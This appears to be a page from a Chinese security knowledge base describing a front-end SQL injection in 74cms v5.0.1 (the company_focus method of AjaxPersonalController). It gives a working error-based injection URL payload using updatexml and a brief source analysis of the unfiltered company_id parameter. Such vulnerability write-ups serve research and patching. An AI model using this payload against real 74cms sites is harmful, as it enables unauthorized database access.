menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 002-74CMS chevron_right 011-74cms v5.0.1 前台sql注入.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    011-74cms v5.0.1 前台sql注入.md
    1007 B / 2021-07-17 00:01:22
        # 74cms v5.0.1 前台sql注入
    
    ### 一、漏洞简介
    
    74cms 5.0.1 前台AjaxPersonalController.class.php存在SQL注入
    
    ### 二、漏洞影响
    
    ### 三、复现过程
    
    具体信息
    
    文件位置:74cms\upload\Application\Home\Controller\AjaxPersonalController.class.php
    
    方法:function company_focus($company_id)
    
    是否需登录:需要
    
    登录权限:普通用户即可
    
    Payload:
    
    
    ```bash
    http://url/74cms/5.0.1/upload/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa%22) and updatexml(1,concat(0x7e,(select user())),0) -- a
    ```
    
    ![](images/15897262837279.png)
    
    
    源码分析:
    
    文件:74cms\upload\Application\Home\Controller\AjaxPersonalController.class.php
    
    company_focus 方法是参数化函数,$company_id参数是不经过I函数过滤的,所以只要where可以控制,那就可以注入
    
    ![](images/15897262925667.png)
    
    
    跟踪add_focus(),发现SQL语句参数外部都可以控制,导致了注入漏洞
    
    ![](images/15897262987324.png)
    
    
    links
    file_download